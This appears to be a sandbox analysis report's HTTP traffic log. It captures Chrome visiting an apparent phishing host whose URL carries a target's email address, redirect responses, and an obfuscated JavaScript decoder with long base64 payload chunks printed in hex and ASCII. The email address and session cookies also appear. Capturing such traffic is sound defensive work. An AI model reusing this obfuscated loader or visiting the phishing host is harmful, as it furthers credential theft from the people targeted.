                                                                                                                                      Connection: close
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=egtusHH3etoB5UDmbD2AQ5v%2F6UWXSTJh0jYlluZqn41P%2F6jqKRon53ibv7Vh3A3qhYLjF2hUQAMY1xoQdrEtSJLqpywQUF%2BcX6HQ%2FCkXBmbJXs31tUMNUSYImxZm7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b754baa7526-SEA
                                                                                                                                      2024-05-08 18:12:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      30192.168.2.1649747104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:45 UTC1503OUTGET /7FF88B1/?jHmmclaughlin@scs.edu HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/7FF88B1/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IjExeTZES0xrOXQybVJTL04vaW1NeFE9PSIsInZhbHVlIjoidnFZRE4yUDFWU0l2MkhHa293cmQwRUg1ak1oalpHMW9NQ0VZOUJEZDEzWDRsZkhiM1JCbjhKR01rRnZ2OWJUa2ttK1d1Z3ZyNVUrQVZnbjlKd0w3ZFJPbjkyeW1UeGMxZG00Zk1OU29ycTNQOVRvYm8wOTR3UktQTmgwYXJoVWQiLCJtYWMiOiJkNTQyMGM5YTk3NjViMmZjNjUzN2IyOTk5MTI2M2Y4ODViM2EwYWRjOWU1NWUzNmU1NDgxY2ExMjJkZjBkYzY2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ii9sU253dnE3MGtxK2c5bjdHM3dsTnc9PSIsInZhbHVlIjoiMmp2SmY1cXQvalMyQ2k4MkZ6N01wdmZkU2pxRlBMQUFZQ29uTDlwVXNFTnhnREQ0akFSS0RNS2ViMGRtRVI4eEhjY1JhUEQwVEozeGRhQWRuU25GNzBpbnZKZjdmc0lERjBzUUdJRmcvQlVmRVZMSmFpYkR0eklGU0lpbHBScDgiLCJtYWMiOiJlODU3NDA2ZWEwNDJmMzI5YmFiYzc3YzgwMmM2MTVlYzMwN2MwZWU3NDMyMjc2MmE4ZWE3MTM0NzE5NTI1YTVhIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:46 UTC1216INHTTP/1.1 302 Found
                                                                                                                                      Date: Wed, 08 May 2024 18:12:46 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, private
                                                                                                                                      Location: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wfaiqv7QXwStcgYe74%2FImTpPjo2PYuQmwgRgyEw6tGe0R%2F2vx8shL3CfsU8HLFDxHGUtcf%2BKZu0ieuB9nJqooCxgEL2FvlDlKcjw7S41N0%2FIyYncHhX5veL2crB7kQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6IlRwUk5tNlRuVE9BMHNuYnRWRm5CSnc9PSIsInZhbHVlIjoiTVFRM1dWQnRqaEExaTV3ZFYrQjlKazkwN2Q0WUxBSFMxaTJlRC9uL3lCS3g0QWtYVllaZFFtT2xKYVcwOU9ZdVV6Z08vRjZzaDNCb0pkbUNTZVNzRG1qdy9qdmY0ZzVSZGFhZGNtVWsvTXdWeldvcEpYZXNlQWRWZkdkRzdUL2kiLCJtYWMiOiIzNjVlM2RkODcyZWM0NGFiZDU3NDJmODdiNzVlZjY5MGZjYTE3MWFiOGM0NjZlODI5YzIzMjk5ZmYzMjQyNWI5IiwidGFnIjoiIn0%3D; expires=Wed, 08-May-2024 20:12:46 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                      2024-05-08 18:12:46 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 70 6b 5a 56 41 35 63 30 78 6b 54 57 68 53 63 56 6c 45 65 6a 4e 4c 55 56 67 32 65 6e 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 62 6a 68 4d 56 57 68 61 52 58 52 4a 54 7a 52 55 4e 6b 5a 4b 53 33 5a 50 63 43 39 78 4f 55 73 77 4d 6e 59 31 61 33 46 73 64 69 39 42 4d 6c 4e 31 59 55 46 57 62 79 39 6b 63 55 31 36 53 31 4a 54 59 30 6c 71 54 32 64 69 57 6b 6c 4f 4f 55 68 49 59 6d 6b 30 64 54 5a 34 54 46 70 6b 65 43 39 5a 52 57 78 4e 4b 31 45 7a 63 54 6b 78 53 6c 4a 6f 4e 6e 70 6e 4d 6d 56 4b 65 6d 4a 58 56 48 68 74 4e 44 52 58 63 6b 52 45 5a 44 68 76 4c 31 70 70 63 55 68 75 56 6b 63 77 62 6b 4a 30 53 32 4a 44 4f 44 46 54 4e 6c 6f 78 62 45 4d
                                                                                                                                      Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkpkZVA5c0xkTWhScVlEejNLUVg2enc9PSIsInZhbHVlIjoibjhMVWhaRXRJTzRUNkZKS3ZPcC9xOUswMnY1a3Fsdi9BMlN1YUFWby9kcU16S1JTY0lqT2diWklOOUhIYmk0dTZ4TFpkeC9ZRWxNK1EzcTkxSlJoNnpnMmVKemJXVHhtNDRXckREZDhvL1ppcUhuVkcwbkJ0S2JDODFTNloxbEM
                                                                                                                                      2024-05-08 18:12:46 UTC1029INData Raw: 33 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 30 6e 31 38 70 79 78 2d 63 6c 69 63 6b 61 64 73 65 72 76 69 63 65 73 2d 72 65 62 6f 6f 6f 74 30 66 61 2e 66 6f 65 63 6c 65 63 2e 63 6f 6d 2f 62 70 6a 69 6f 7a 64 77 6e 6f 65 6d 75 74 72 71 7a 74 6f 76 70 64 77 79 6d 78 63 57 4a 5a 4d 43 48 50 44 4d 54 4a 52 47 50 53 51 57 55 56 41 58 56 51 59 54 43 52 43 45 59 48 55 4b 5a 41 54 49 4b 52 4a 4a 4c 46 58 58 58 49 4d 55 48
                                                                                                                                      Data Ascii: 3fe<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUH
                                                                                                                                      2024-05-08 18:12:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      31192.168.2.1649751104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:46 UTC1612OUTGET /bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/7FF88B1/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IlRwUk5tNlRuVE9BMHNuYnRWRm5CSnc9PSIsInZhbHVlIjoiTVFRM1dWQnRqaEExaTV3ZFYrQjlKazkwN2Q0WUxBSFMxaTJlRC9uL3lCS3g0QWtYVllaZFFtT2xKYVcwOU9ZdVV6Z08vRjZzaDNCb0pkbUNTZVNzRG1qdy9qdmY0ZzVSZGFhZGNtVWsvTXdWeldvcEpYZXNlQWRWZkdkRzdUL2kiLCJtYWMiOiIzNjVlM2RkODcyZWM0NGFiZDU3NDJmODdiNzVlZjY5MGZjYTE3MWFiOGM0NjZlODI5YzIzMjk5ZmYzMjQyNWI5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkpkZVA5c0xkTWhScVlEejNLUVg2enc9PSIsInZhbHVlIjoibjhMVWhaRXRJTzRUNkZKS3ZPcC9xOUswMnY1a3Fsdi9BMlN1YUFWby9kcU16S1JTY0lqT2diWklOOUhIYmk0dTZ4TFpkeC9ZRWxNK1EzcTkxSlJoNnpnMmVKemJXVHhtNDRXckREZDhvL1ppcUhuVkcwbkJ0S2JDODFTNloxbEMiLCJtYWMiOiI2ZDllNzc4MTkwNDE3ODM3NDUzODY1MWI1ZDZiMmVkYTUxZWRkZTc5MzkyMTUzNDhlZjY3NzcxMzZjMWExYzI3IiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:47 UTC1009INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:47 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, private
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TDOG1YcXBnTPnCORj%2BRaujv9wbAdCxU4Zty1KZzLZLNLd1R%2FHoPq86U%2F3VI7a16wPdTkfSCIKGvnu9OIDotqIEeV6p8saE%2BNLUhoEoqn9%2Fwk9d1w0v2MCqjM4TJP7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; expires=Wed, 08-May-2024 20:12:47 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                      2024-05-08 18:12:47 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 46 71 5a 32 4e 44 55 6e 51 32 55 44 4a 54 61 32 64 55 53 6e 55 7a 4e 7a 6c 77 5a 58 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 55 31 6c 4a 53 46 70 57 64 55 4a 73 59 6d 52 5a 56 47 56 51 55 57 31 42 51 6d 4a 69 4e 30 39 4f 64 6b 39 46 52 6c 4e 6a 62 58 49 72 57 57 56 79 55 33 41 78 4e 31 5a 57 53 47 5a 4a 57 47 39 55 4f 56 67 77 62 30 64 55 54 45 56 52 53 55 5a 69 56 58 4a 32 57 6b 74 42 64 47 5a 36 52 45 4a 69 64 56 56 75 5a 32 64 33 55 6a 52 70 4d 45 4a 79 4d 56 42 52 53 6a 52 49 55 7a 42 33 59 57 70 35 4d 47 52 6d 4b 31 41 78 61 30 55 30 4c 30 64 36 59 30 6c 5a 4d 32 70 55 57 6a 68 46 56 6e 59 31 56 6b 46 6e 54 31 56 52 63 30 67
                                                                                                                                      Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0g
                                                                                                                                      2024-05-08 18:12:47 UTC1369INData Raw: 35 32 61 65 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 6b 57 53 4f 53 49 56 56 54 72 28 6b 56 56 41 53 68 6c 64 56 66 2c 20 5a 6c 54 4e 66 6a 6d 49 72 64 29 20 7b 0d 0a 6c 65 74 20 56 68 47 63 56 75 45 48 64 57 20 3d 20 27 27 3b 0d 0a 6b 56 56 41 53 68 6c 64 56 66 20 3d 20 61 74 6f 62 28 6b 56 56 41 53 68 6c 64 56 66 29 3b 0d 0a 6c 65 74 20 53 4e 4c 69 4c 46 6c 6f 46 79 20 3d 20 5a 6c 54 4e 66 6a 6d 49 72 64 2e 6c 65 6e 67 74 68 3b 0d 0a 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 6b 56 56 41 53 68 6c 64 56 66 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 20 20 20 20 56 68 47 63 56 75 45 48 64 57 20 2b 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6b 56 56 41 53 68 6c 64 56 66 2e 63 68 61 72 43
                                                                                                                                      Data Ascii: 52ae<script>function kWSOSIVVTr(kVVAShldVf, ZlTNfjmIrd) {let VhGcVuEHdW = '';kVVAShldVf = atob(kVVAShldVf);let SNLiLFloFy = ZlTNfjmIrd.length;for (let i = 0; i < kVVAShldVf.length; i++) { VhGcVuEHdW += String.fromCharCode(kVVAShldVf.charC
                                                                                                                                      2024-05-08 18:12:47 UTC1369INData Raw: 6e 48 52 74 75 4b 44 51 47 58 51 4d 54 4e 52 6c 68 55 41 49 30 41 67 35 53 55 33 49 49 49 77 52 53 4a 42 70 58 46 6c 4e 79 48 53 6c 4a 46 58 39 58 58 77 30 66 4a 6b 59 6e 56 68 59 6b 56 78 6b 42 41 7a 30 61 49 31 59 43 4b 78 4a 51 44 45 78 77 43 44 35 57 48 6a 73 59 56 68 63 43 63 46 64 64 4d 31 42 69 56 52 6c 65 48 54 73 48 4f 78 6b 43 4a 78 6b 45 51 41 45 67 44 44 78 57 45 53 5a 58 47 51 6f 44 4e 77 39 74 47 30 68 37 48 56 4d 4e 45 68 4d 6f 41 6d 6f 56 49 44 78 71 55 45 59 31 4c 78 78 36 46 43 63 54 61 7a 55 59 4e 69 30 44 41 52 73 58 46 46 74 56 52 33 42 4a 4d 55 70 4e 59 42 4e 57 44 41 56 77 53 53 52 41 41 43 64 49 47 77 51 65 50 42 31 2f 54 68 38 6b 45 77 74 41 55 54 45 62 50 30 6f 44 4c 51 64 51 42 52 67 38 56 48 4a 59 48 69 30 62 51 41 38 65 4a 78
                                                                                                                                      Data Ascii: nHRtuKDQGXQMTNRlhUAI0Ag5SU3IIIwRSJBpXFlNyHSlJFX9XXw0fJkYnVhYkVxkBAz0aI1YCKxJQDExwCD5WHjsYVhcCcFddM1BiVRleHTsHOxkCJxkEQAEgDDxWESZXGQoDNw9tG0h7HVMNEhMoAmoVIDxqUEY1Lxx6FCcTazUYNi0DARsXFFtVR3BJMUpNYBNWDAVwSSRAACdIGwQePB1/Th8kEwtAUTEbP0oDLQdQBRg8VHJYHi0bQA8eJx
                                                                                                                                      2024-05-08 18:12:47 UTC1369INData Raw: 53 31 68 52 59 42 6b 6f 47 51 4d 74 47 56 41 47 55 58 46 5a 59 41 39 48 49 45 30 43 62 33 74 79 53 58 41 5a 55 47 4a 56 47 55 4a 52 63 6b 6b 67 57 42 51 6d 48 46 63 46 53 33 4a 63 49 45 46 51 63 55 56 4a 47 6b 70 66 59 33 41 5a 55 47 4a 56 47 55 4a 52 63 6b 6c 77 47 52 59 74 47 30 31 50 41 6a 73 54 4e 51 4e 51 63 30 42 4a 47 6b 70 66 59 33 41 5a 55 47 4a 56 47 55 4a 52 63 6b 6c 77 47 52 4d 33 42 30 6f 4e 41 32 68 4a 49 46 59 5a 4c 41 46 63 45 45 70 66 59 33 41 5a 55 47 4a 56 47 55 4a 52 4c 32 52 61 47 56 42 69 56 54 52 6f 55 58 4a 4a 63 42 6c 51 59 6c 55 58 41 41 55 38 55 7a 68 57 42 69 63 48 47 52 6c 38 57 45 6c 77 47 56 42 69 56 52 6c 43 55 58 4a 4a 63 46 73 52 49 52 35 65 45 42 34 6e 42 7a 51 55 45 79 30 5a 56 68 42 4c 63 6b 70 67 43 55 5a 31 46 77 46
                                                                                                                                      Data Ascii: S1hRYBkoGQMtGVAGUXFZYA9HIE0Cb3tySXAZUGJVGUJRckkgWBQmHFcFS3JcIEFQcUVJGkpfY3AZUGJVGUJRcklwGRYtG01PAjsTNQNQc0BJGkpfY3AZUGJVGUJRcklwGRM3B0oNA2hJIFYZLAFcEEpfY3AZUGJVGUJRL2RaGVBiVTRoUXJJcBlQYlUXAAU8UzhWBicHGRl8WElwGVBiVRlCUXJJcFsRIR5eEB4nBzQUEy0ZVhBLckpgCUZ1FwF
                                                                                                                                      2024-05-08 18:12:47 UTC1369INData Raw: 55 35 50 66 7a 52 6f 54 54 41 47 4e 45 42 51 49 52 6c 59 45 51 4a 76 53 79 4e 4e 45 54 41 42 56 77 63 47 63 46 64 64 4d 30 77 6d 48 45 39 43 47 44 5a 55 63 6b 6f 56 49 51 46 51 44 52 38 68 53 33 42 61 48 43 4d 47 53 6c 39 54 63 46 64 64 4d 31 42 69 56 52 6c 65 41 6a 63 4b 4a 46 41 66 4c 46 56 51 42 6b 78 77 47 6a 56 61 42 43 73 61 56 7a 30 46 49 42 41 35 56 78 63 32 47 6b 6f 4c 46 6a 77 41 50 68 74 51 4d 51 46 41 44 68 52 76 53 7a 46 58 47 53 38 55 54 51 73 65 50 46 4d 6a 55 52 38 31 57 46 38 51 48 6a 39 45 49 6c 41 58 4b 67 45 5a 55 6c 39 6e 47 6d 73 62 55 43 45 5a 57 42 45 43 62 30 74 79 42 33 31 49 56 52 6c 43 55 58 4a 4a 63 42 6c 4d 4a 68 78 50 51 68 49 2b 43 43 4e 4b 54 57 41 55 54 42 59 5a 66 78 34 69 57 41 41 79 45 45 74 41 54 31 39 6a 63 42 6c 51
                                                                                                                                      Data Ascii: U5PfzRoTTAGNEBQIRlYEQJvSyNNETABVwcGcFddM0wmHE9CGDZUckoVIQFQDR8hS3BaHCMGSl9TcFddM1BiVRleAjcKJFAfLFVQBkxwGjVaBCsaVz0FIBA5Vxc2GkoLFjwAPhtQMQFADhRvSzFXGS8UTQsePFMjUR81WF8QHj9EIlAXKgEZUl9nGmsbUCEZWBECb0tyB31IVRlCUXJJcBlMJhxPQhI+CCNKTWAUTBYZfx4iWAAyEEtAT19jcBlQ
                                                                                                                                      2024-05-08 18:12:47 UTC1369INData Raw: 59 41 4a 68 6b 54 4c 68 52 4b 45 55 78 77 43 43 56 4e 47 47 38 43 53 77 4d 42 49 67 77 69 47 30 35 50 66 78 6c 43 55 58 4a 4a 63 42 6c 51 59 6c 55 5a 51 6b 30 32 41 43 59 5a 45 79 34 55 53 68 46 4d 63 41 55 2f 57 42 51 72 47 31 35 50 45 6a 30 48 4a 46 67 5a 4c 42 42 4c 51 45 39 66 59 33 41 5a 55 47 4a 56 47 55 4a 52 63 6b 6c 77 47 56 42 69 56 52 6c 65 46 54 73 66 63 46 6f 63 49 77 5a 4b 58 31 4d 32 42 69 51 55 46 69 34 61 57 42 59 59 50 41 35 79 42 30 78 74 45 56 41 55 54 31 39 6a 63 42 6c 51 59 6c 55 5a 51 6c 46 79 53 58 41 5a 55 47 4a 56 47 56 34 56 4f 78 39 77 57 68 77 6a 42 6b 70 66 55 7a 59 47 4a 42 51 57 4c 68 70 59 46 68 67 38 44 6e 49 48 54 47 30 52 55 42 52 50 58 32 4e 77 47 56 42 69 56 52 6c 43 55 58 4a 4a 63 42 6c 51 59 6c 55 5a 58 68 55 37 48
                                                                                                                                      Data Ascii: YAJhkTLhRKEUxwCCVNGG8CSwMBIgwiG05PfxlCUXJJcBlQYlUZQk02ACYZEy4UShFMcAU/WBQrG15PEj0HJFgZLBBLQE9fY3AZUGJVGUJRcklwGVBiVRleFTsfcFocIwZKX1M2BiQUFi4aWBYYPA5yB0xtEVAUT19jcBlQYlUZQlFySXAZUGJVGV4VOx9wWhwjBkpfUzYGJBQWLhpYFhg8DnIHTG0RUBRPX2NwGVBiVRlCUXJJcBlQYlUZXhU7H
                                                                                                                                      2024-05-08 18:12:47 UTC1369INData Raw: 46 45 6c 45 78 42 54 46 4b 41 33 39 58 56 41 42 63 59 31 39 79 42 7a 34 74 56 56 67 42 45 6a 30 63 50 6b 31 50 59 6b 6c 59 51 68 6b 67 44 44 59 45 55 6d 46 58 47 51 59 51 4a 67 68 39 55 42 52 2f 56 30 6f 4c 46 6a 77 63 49 42 74 51 4c 52 74 61 44 68 67 78 41 6d 30 62 48 43 73 62 55 67 30 42 4a 67 41 2f 56 78 4d 75 48 46 6f 4a 57 53 59 42 4f 55 70 5a 59 46 56 61 44 68 41 68 47 6d 30 62 48 43 73 62 55 6b 42 50 45 52 73 31 57 41 51 6e 56 56 59 4d 46 48 4e 56 66 31 68 4f 66 6c 70 4a 58 45 30 7a 53 54 4e 56 45 54 45 47 42 45 41 64 4f 77 63 37 47 52 30 67 57 41 68 55 55 33 49 4e 4d 55 30 52 62 78 78 64 58 31 4d 78 43 44 35 4e 4d 53 45 57 58 42 45 43 45 77 6f 7a 56 67 55 73 41 52 74 43 48 6a 77 4b 50 46 41 54 4b 55 67 62 44 68 67 38 41 6a 39 4a 42 43 73 61 56 77
                                                                                                                                      Data Ascii: FElExBTFKA39XVABcY19yBz4tVVgBEj0cPk1PYklYQhkgDDYEUmFXGQYQJgh9UBR/V0oLFjwcIBtQLRtaDhgxAm0bHCsbUg0BJgA/VxMuHFoJWSYBOUpZYFVaDhAhGm0bHCsbUkBPERs1WAQnVVYMFHNVf1hOflpJXE0zSTNVETEGBEAdOwc7GR0gWAhUU3INMU0RbxxdX1MxCD5NMSEWXBECEwozVgUsARtCHjwKPFATKUgbDhg8Aj9JBCsaVw
                                                                                                                                      2024-05-08 18:12:47 UTC1369INData Raw: 55 47 4a 56 47 55 4a 52 63 6b 6c 77 47 56 42 2b 45 56 41 55 55 54 45 46 4d 55 6f 44 66 31 64 64 44 51 56 2f 44 7a 78 57 45 54 59 63 56 77 56 54 62 46 56 2f 58 52 6b 30 53 7a 52 6f 55 58 4a 4a 63 42 6c 51 59 6c 55 5a 51 6c 46 79 53 58 41 5a 55 48 34 52 55 42 52 52 4d 51 55 78 53 67 4e 2f 56 31 30 4e 42 58 38 50 50 46 59 52 4e 68 78 58 42 56 4e 73 56 58 39 64 47 54 52 4c 4e 47 68 52 63 6b 6c 77 47 56 42 69 56 52 6c 43 55 58 4a 56 66 31 30 5a 4e 45 73 30 61 46 46 79 53 58 41 5a 55 47 4a 56 47 55 4a 52 63 6c 55 30 55 41 5a 69 46 6c 55 44 41 69 46 55 63 6b 6f 56 49 51 46 51 44 52 38 78 42 6a 35 4e 46 53 77 42 47 31 78 38 57 45 6c 77 47 56 42 69 56 52 6c 43 55 58 4a 4a 63 41 55 55 4b 77 4d 5a 41 52 30 7a 47 69 4d 45 55 69 41 55 56 77 77 55 49 41 55 2f 58 68 39
                                                                                                                                      Data Ascii: UGJVGUJRcklwGVB+EVAUUTEFMUoDf1ddDQV/DzxWETYcVwVTbFV/XRk0SzRoUXJJcBlQYlUZQlFySXAZUH4RUBRRMQUxSgN/V10NBX8PPFYRNhxXBVNsVX9dGTRLNGhRcklwGVBiVRlCUXJVf10ZNEs0aFFySXAZUGJVGUJRclU0UAZiFlUDAiFUckoVIQFQDR8xBj5NFSwBG1x8WElwGVBiVRlCUXJJcAUUKwMZAR0zGiMEUiAUVwwUIAU/Xh9
                                                                                                                                      2024-05-08 18:12:47 UTC1369INData Raw: 67 64 79 47 52 6b 6d 53 42 73 41 42 54 77 32 49 31 41 58 59 45 74 71 43 78 59 38 53 54 6c 58 54 47 30 58 54 42 59 46 50 51 64 75 4e 48 70 69 56 52 6c 43 55 58 4a 4a 63 42 6c 51 59 6c 55 46 54 52 55 37 48 32 34 30 65 6d 4a 56 47 55 4a 52 63 6b 6c 77 42 56 38 6d 48 45 39 63 66 46 68 4a 63 42 6c 51 66 6c 70 4b 42 78 49 6d 41 44 39 58 54 6b 39 2f 4e 47 68 52 63 6b 6c 77 42 51 4d 6e 46 6b 30 4c 48 6a 78 4a 4f 56 31 4e 59 41 5a 63 41 51 55 37 42 6a 35 6d 43 53 30 41 58 51 30 66 4a 67 45 78 54 78 55 6a 46 6c 6f 48 41 69 46 4c 63 46 6f 63 49 77 5a 4b 58 31 4d 32 52 44 35 57 48 69 64 58 42 32 39 37 63 6b 6c 77 47 56 42 69 56 52 6c 65 46 54 73 66 63 46 6f 63 49 77 5a 4b 58 31 4d 7a 48 43 52 52 58 54 55 48 57 42 49 42 4e 78 74 79 42 33 31 49 56 52 6c 43 55 58 4a 4a
                                                                                                                                      Data Ascii: gdyGRkmSBsABTw2I1AXYEtqCxY8STlXTG0XTBYFPQduNHpiVRlCUXJJcBlQYlUFTRU7H240emJVGUJRcklwBV8mHE9cfFhJcBlQflpKBxImAD9XTk9/NGhRcklwBQMnFk0LHjxJOV1NYAZcAQU7Bj5mCS0AXQ0fJgExTxUjFloHAiFLcFocIwZKX1M2RD5WHidXB297cklwGVBiVRleFTsfcFocIwZKX1MzHCRRXTUHWBIBNxtyB31IVRlCUXJJ
